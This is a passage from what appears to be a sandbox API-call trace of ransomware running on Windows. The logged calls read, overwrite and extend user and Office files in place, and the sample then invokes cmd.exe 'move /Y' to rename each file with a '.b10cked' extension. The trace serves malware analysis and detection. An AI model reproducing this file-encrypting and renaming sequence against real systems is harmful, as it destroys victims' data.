dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3a7c [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.522] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.522] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.522] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3594 [0151.522] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0151.523] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0151.523] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.523] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3a7c [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3a7c [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.524] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.525] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0151.525] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0151.525] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pending.GRL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0151.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pending.GRL", cchWideChar=11, lpMultiByteStr=0x131324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pending.GRL", lpUsedDefaultChar=0x0) returned 11 [0151.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3a7c [0151.531] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0151.531] CloseHandle (hObject=0x114) returned 1 [0151.531] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL") returned 0x29 [0151.626] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0151.627] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbec, dwThreadId=0xc38)) returned 1 [0151.633] CloseHandle (hObject=0x110) returned 1 [0151.633] CloseHandle (hObject=0x114) returned 1 [0151.633] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0151.633] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0151.633] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount1=32, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount2=32) returned 2 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20842431552) returned 1 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.637] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3478 [0151.637] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3960 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0151.695] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.696] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3960 [0151.696] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.696] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.696] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0151.712] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.712] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0151.713] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0151.713] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0151.713] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0151.713] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0151.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0151.718] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3960 [0151.719] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0151.719] CloseHandle (hObject=0x114) returned 1 [0151.719] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX") returned 0x3c [0151.720] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0151.721] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xce4, dwThreadId=0xa10)) returned 1 [0151.727] CloseHandle (hObject=0x110) returned 1 [0151.727] CloseHandle (hObject=0x114) returned 1 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0151.727] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount2=32) returned 3 